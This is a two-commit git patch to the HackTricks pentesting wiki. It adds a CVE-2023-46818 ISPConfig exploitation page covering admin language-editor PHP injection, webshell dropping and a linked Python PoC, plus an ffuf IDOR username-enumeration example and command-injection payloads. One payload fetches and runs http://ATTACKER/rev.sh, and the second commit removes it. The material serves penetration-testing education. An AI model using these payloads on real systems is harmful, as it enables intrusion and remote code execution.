From 399a99eefadff23055a7956c008428b541339705 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 27 Aug 2025 19:21:10 +0000 Subject: [PATCH 1/2] =?UTF-8?q?Add=20content=20from:=20HTB=20Nocturnal:=20?= =?UTF-8?q?IDOR=20=E2=86=92=20Command=20Injection=20=E2=86=92=20Root=20via?= =?UTF-8?q?=20ISPConfig...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Remove searchindex.js (auto-generated file) --- src/SUMMARY.md | 1 + .../pentesting-web/README.md | 1 + .../pentesting-web/ispconfig.md | 107 ++++++++++++++++++ src/pentesting-web/command-injection.md | 33 ++++++ src/pentesting-web/idor.md | 22 ++++ 5 files changed, 164 insertions(+) create mode 100644 src/network-services-pentesting/pentesting-web/ispconfig.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1659bf643..987a7b93d 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -430,6 +430,7 @@ - [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md) - [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md) - [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md) + - [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md) - [JBOSS](network-services-pentesting/pentesting-web/jboss.md) - [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md) - [Joomla](network-services-pentesting/pentesting-web/joomla.md) diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index 41291959b..5cc3a738c 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno - [**Golang**](golang.md) - [**GraphQL**](graphql.md) - [**H2 - Java SQL database**](h2-java-sql-database.md) +- [**ISPConfig**](ispconfig.md) - [**IIS tricks**](iis-internet-information-services.md) - [**Microsoft SharePoint**](microsoft-sharepoint.md) - [**JBOSS**](jboss.md) diff --git a/src/network-services-pentesting/pentesting-web/ispconfig.md b/src/network-services-pentesting/pentesting-web/ispconfig.md new file mode 100644 index 000000000..3aba03e1c --- /dev/null +++ b/src/network-services-pentesting/pentesting-web/ispconfig.md @@ -0,0 +1,107 @@ +# ISPConfig + +{{#include ../../banners/hacktricks-training.md}} + +## Overview + +ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation. + +Key default paths: +- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx. +- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed). + +Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it: + +```bash +ssh -L 9001:127.0.0.1:8080 user@target +# then browse http://127.0.0.1:9001 +``` + +## Language editor PHP code injection (CVE-2023-46818) + +- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1) +- Preconditions: + - Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor) + - Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini` +- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context + +References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below. + +### Manual exploitation flow + +1) Open/create a language file to obtain CSRF tokens + +Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`. + +2) Inject PHP via records[] and save + +Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes: + +```http +POST /admin/language_edit.php HTTP/1.1 +Host: 127.0.0.1:9001 +Content-Type: application/x-www-form-urlencoded +Cookie: ispconfig_auth=... + +lang=en&module=admin&file=messages&csrf_id=&csrf_key=&records[]= +``` + +Out-of-band test (observe ICMP): + +```http +records[]= +``` + +3) Write files and drop a webshell + +Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`): + +```http +records[]= +``` + +Then write a simple webshell using base64 to avoid bad characters in the POST body: + +```http +records[]= +``` + +Use it: + +```bash +curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id' +``` + +If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user. + +### Python PoC + +A ready-to-use exploit automates token handling and payload delivery: +- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) + +Example run: + +```bash +python3 cve-2023-46818.py http://127.0.0.1:9001 admin +``` + +### Hardening + +- Upgrade to 3.2.11p1 or later +- Disable the language editor unless strictly needed: + +``` +admin_allow_langedit=no +``` + +- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges +- Enforce strong authentication for the built-in `admin` account + +## References + +- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/) +- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818) +- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) +- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 678e0772a..9ac7b730e 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -131,6 +131,37 @@ powershell C:**2\n??e*d.*? # notepad ../linux-hardening/bypass-bash-restrictions/ {{#endref}} +##### Newline and tab blacklist bypass (space and metacharacters filtered) + +Many “naive blacklist” filters block space and shell metacharacters like `;`, `&`, `|`, `` ` ``, `{`, `}`, `&&`, but forget to block newlines (`%0a`) and tabs (`%09`). If user input is concatenated into a shell command (for example via PHP `proc_open()`/`system()`), you can: + +- Inject a newline to start a new command +- Use tabs as whitespace where space is blocked + +Example payload for a password-like field reaching a shell (URL-encoded): + +``` +0xdf%0abash%09-c%09"id"%0a +``` + +The resulting process executes as two lines: + +``` +zip -x './backups/*' -r -P 0xdf +bash -c "id" +``` + +Chaining without `&`: fetch and execute a reverse shell in separate lines: + +``` +0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a +``` + +Notes +- Newlines are command separators for POSIX shells; tabs are valid whitespace. +- This works even if spaces and `;|&` are filtered, as long as `\n` and `\t` are not. +- See PHP docs for `proc_open()`/`system()` behavior when given a string (it spawns `/bin/sh -c`). + ### Node.js `child_process.exec` vs `execFile` When auditing JavaScript/TypeScript back-ends you will often encounter the Node.js `child_process` API. @@ -170,5 +201,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) +- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) +- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) {{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/idor.md b/src/pentesting-web/idor.md index e0f95bfdf..f6d16630e 100644 --- a/src/pentesting-web/idor.md +++ b/src/pentesting-web/idor.md @@ -38,6 +38,27 @@ for id in $(seq 64185742 64185700); do done ``` +--- + +### Error-response oracle for user/file enumeration + +When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=&file=`), subtle differences in error messages often create an oracle: + +- Non-existent username → "User not found" +- Bad filename but valid extension → "File does not exist" (sometimes also lists available files) +- Bad extension → validation error + +With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "user not found" string to discover valid users: + +```bash +ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \ + -b 'PHPSESSID=' \ + -w /opt/SecLists/Usernames/Names/names.txt \ + -fr 'User not found' +``` + +Once valid usernames are identified, request specific files directly (e.g., `/view.php?username=amanda&file=privacy.odt`). This pattern commonly leads to unauthorized disclosure of other users’ documents and credential leakage. + --- ## 2. Real-World Case Study – McHire Chatbot Platform (2025) @@ -86,4 +107,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces * [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds) * [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/) * [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489) +* [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) {{#include ../banners/hacktricks-training.md}} From ff4d1db05b71d742089aa9ca929b12724183eea2 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Thu, 28 Aug 2025 12:05:50 +0200 Subject: [PATCH 2/2] Update command-injection.md --- src/pentesting-web/command-injection.md | 32 +------------------------ 1 file changed, 1 insertion(+), 31 deletions(-) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 9ac7b730e..8529062f6 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -19,6 +19,7 @@ ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe) ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º ls %0A id # %0A Execute both (RECOMMENDED) +ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs) #Only unix supported `ls` # `` @@ -131,37 +132,6 @@ powershell C:**2\n??e*d.*? # notepad ../linux-hardening/bypass-bash-restrictions/ {{#endref}} -##### Newline and tab blacklist bypass (space and metacharacters filtered) - -Many “naive blacklist” filters block space and shell metacharacters like `;`, `&`, `|`, `` ` ``, `{`, `}`, `&&`, but forget to block newlines (`%0a`) and tabs (`%09`). If user input is concatenated into a shell command (for example via PHP `proc_open()`/`system()`), you can: - -- Inject a newline to start a new command -- Use tabs as whitespace where space is blocked - -Example payload for a password-like field reaching a shell (URL-encoded): - -``` -0xdf%0abash%09-c%09"id"%0a -``` - -The resulting process executes as two lines: - -``` -zip -x './backups/*' -r -P 0xdf -bash -c "id" -``` - -Chaining without `&`: fetch and execute a reverse shell in separate lines: - -``` -0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a -``` - -Notes -- Newlines are command separators for POSIX shells; tabs are valid whitespace. -- This works even if spaces and `;|&` are filtered, as long as `\n` and `\t` are not. -- See PHP docs for `proc_open()`/`system()` behavior when given a string (it spawns `/bin/sh -c`). - ### Node.js `child_process.exec` vs `execFile` When auditing JavaScript/TypeScript back-ends you will often encounter the Node.js `child_process` API.